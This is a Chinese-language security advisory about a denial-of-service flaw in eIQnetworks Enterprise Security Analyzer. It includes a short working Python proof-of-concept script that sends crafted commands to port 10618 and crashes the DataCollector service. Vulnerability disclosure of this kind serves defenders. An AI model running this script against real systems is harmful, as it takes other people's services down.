当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

EIQ Networks Security Analyzer空指针间接引用客户端拒绝服务漏洞

信息来源:Ethan Hunt      发表日期:2013-11-01 14:14:00

EIQ Networks Security Analyzer是网络安全分析器软件。

EIQ Networks Security Analyzer存在空指针间接引用漏洞,攻击者通过发送特制的数据到目标系统的10618端口,即可利用此漏洞使 DataCollector服务崩溃。

 

BUGTRAQ-ID:21994

受影响系统:

eIQnetworks Enterprise Security Analyzer 2.5

eIQnetworks Enterprise Security Analyzer 2.1

eIQnetworks Enterprise Security Analyzer 2.0

 

测试方法:

警  告!以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!c:\\python\\python.exe

 # uncomment whichever function youd like. theyll all crash in a similar way.

 

 import socket

 

 s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)

 s.connect((\'192.168.1.101\', 10618))

 

 print "[*] connected"

 

 s.send("&CONNECTSERVER&")

 #s.send("&ADDENTRY&")

 #s.send("&FIN&")

 #s.send("&START&")

 #s.send("&LOGPATH&")

 #s.send("&FWADELTA&")

 #s.send("&FWALOG&")

 #s.send("&SETSYNCHRONOUS&")

 #s.send("&SETPRGFILE&")

 #s.send("&SETREPLYPORT&")

 

 print "disconnecting."

 

 s.close()

解决办法:安装厂商补丁

厂商补丁:

eIQnetworks

-----------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.eiqnetworks.com/

参考信息:

http://seclists.org/fulldisclosure/2007/Jan/208